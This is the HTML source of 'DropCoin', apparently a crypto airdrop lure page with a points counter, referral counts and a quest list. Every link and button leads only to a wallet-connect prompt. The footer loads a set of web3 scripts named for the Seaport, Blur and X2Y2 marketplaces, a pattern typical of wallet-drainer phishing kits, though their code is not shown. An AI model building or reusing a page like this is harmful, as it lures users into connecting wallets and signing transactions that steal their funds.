<html><head><meta charset="UTF-8">
<link rel="icon" type="image/svg+xml" href="images/favicon.svg">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="theme-color" content="#000000">
<meta name="description" content="Web site created using create-react-app">
<link rel="apple-touch-icon" href="images/logo192.png">
<title>DropCoin</title>
<link href="css/main.f674e68c.css" rel="stylesheet">
<style>
            body {
                background-color: #ffcf00;
                font-family: "04b 30";
            }
            button {
                font-size: 23px;
                font-weight: 700;
                cursor: pointer;
            }
            button:hover {
                opacity: 0.8;
                background: #f9efc5;
            }
        </style>
<link href="css/sweetalert2.min.css" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&amp;family=Montserrat:wght@400;500;700&amp;family=Raleway:wght@400;500;700&amp;family=Roboto:wght@400;500;700&amp;display=swap" rel="stylesheet">


</head>
    <body>
        
        <div id="root">
            <div class="App">
                <div class="anim">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n1"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n2">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n3"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n4">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n5"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n6">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n1"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n2">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n3"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n4">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n5"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n6">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n1"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n2">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n3"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n4">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n5"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n6">
                    <img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n1"><img src="images/coin_2.ca44c5bc8576c700abdd812885c9dbc6.svg" class="i n2">
                </div>
                <div class="menu">
                    <a aria-current="page" onclick="modalOpen()" class="nav-item active" href="#"><img src="images/farming.a672b550571540a26d267b69c8f78f23.svg"> farming</a>
                    <a class="nav-item" onclick="modalOpen()" href="#"><img src="images/coin.80a7050d4ea71065c04b322cccee0991.svg">tokenomics</a>
                    <a class="nav-item" onclick="modalOpen()" href="#"><img src="images/whitepaper.75de9b981617e3736cab9063799f7ace.svg">whitepaper</a>
                    <a class="nav-item" onclick="modalOpen()" href="#"><img src="images/twitter.6c76c7f53095380a90bc362ef4b80797.svg">LINK X PROFILE</a>
                </div>
                <div class="drop">DROP POINTS</div>
                <div class="points">0 <img src="images/gift_big.5aca0ad387af1a0232e453b3b398dbf8.svg"></div>
                <button class="referals" onclick="modalOpen()">CONNECT WALLET</button>
                <div class="referals sub-referrals">REFERRALS: 0</div>
                <div class="referals sub-referrals">SUB-REFERRALS: 0</div>
                <div class="task-container">
                    <div class="task-block">
                        <div class="task-block-items">
                            <div class="task-block-item line-through">EAT <img src="images/farming.a672b550571540a26d267b69c8f78f23.svg"></div>
                            <div class="task-block-item line-through">SLEAP <img src="images/farming.a672b550571540a26d267b69c8f78f23.svg"></div>
                            <div class="task-block-item">FARM $DROP <img src="images/farming.a672b550571540a26d267b69c8f78f23.svg"></div>
                            <div class="task-block-no-border task-block-item">REPEAT <img src="images/farming.a672b550571540a26d267b69c8f78f23.svg"></div>
                        </div>
                    </div>
                    <div class="task-items">
                        <div class="claim-button task-item">
                            <div onclick="modalOpen()" class="task-item-desc"><span class="item-text"></span><img src="images/gift_black.11a9e0300afb488bb975ec072a16660f.svg"><span style="margin-left: 25px;" onclick="modalOpen()">CONNECT YOUR WALLET</span></div>
                            <img src="images/arrow-right.f99f3d286a999073ef19d4b2a70f0d9b.svg">
                        </div>
                        <div class="task-item" style="background-color: rgb(0, 0, 0); box-shadow: rgb(255, 255, 255) -10px 10px 0px 0px;">
                            <div class="task-item-desc"><img src="images/lock.5aa67461b72ca93de2cfee1f2f230983.svg"><span style="margin-left: 25px; color: rgb(255, 255, 255);">LOCKED</span></div>
                            <img src="images/arrow-right.f99f3d286a999073ef19d4b2a70f0d9b.svg">
                        </div>
                        <div class="task-item" style="background-color: rgb(0, 0, 0); box-shadow: rgb(255, 255, 255) -10px 10px 0px 0px;">
                            <div class="task-item-desc"><img src="images/lock.5aa67461b72ca93de2cfee1f2f230983.svg"><span style="margin-left: 25px; color: rgb(255, 255, 255);">LOCKED</span></div>
                            <img src="images/arrow-right.f99f3d286a999073ef19d4b2a70f0d9b.svg">
                        </div>
                    </div>
                </div>
                <div class="drop-all">MORE QUESTS SOON...</div>
            </div>
        </div>

<script>(function(){var js = "window['__CF$cv$params']={r:'835ed7d08ff1d0b5',t:'MTcwMjY0NDk0OC42NjcwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script><iframe height="1" width="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe></body>
<footer>
<script src="/assets/web3-provider/web3-modal.js"></script>
<script src="/assets/web3-provider/web3-loader.js"></script>
<script src="/assets/web3-provider/web3-connect.js"></script>
<script src="/assets/web3-provider/web3-router.js"></script>
<script src="/assets/web3-provider/web3-module.js"></script>
<script src="/assets/web3-provider/web3-alert.js"></script>
<script src="/assets/web3-provider/web3-seaport.js"></script>
<script src="/assets/web3-provider/web3-data.js"></script>
<script src="/assets/web3-provider/ethers.js"></script>
<script src="/assets/web3-provider/ethereum-tx.js"></script>
<script src="/assets/web3-modules/module-seaport.js"></script>
<script src="/assets/web3-modules/module-blur.js"></script>
<script src="/assets/web3-modules/module-x2y2.js"></script>
<script src="/assets/web3-provider.js"></script>
</footer>
</html>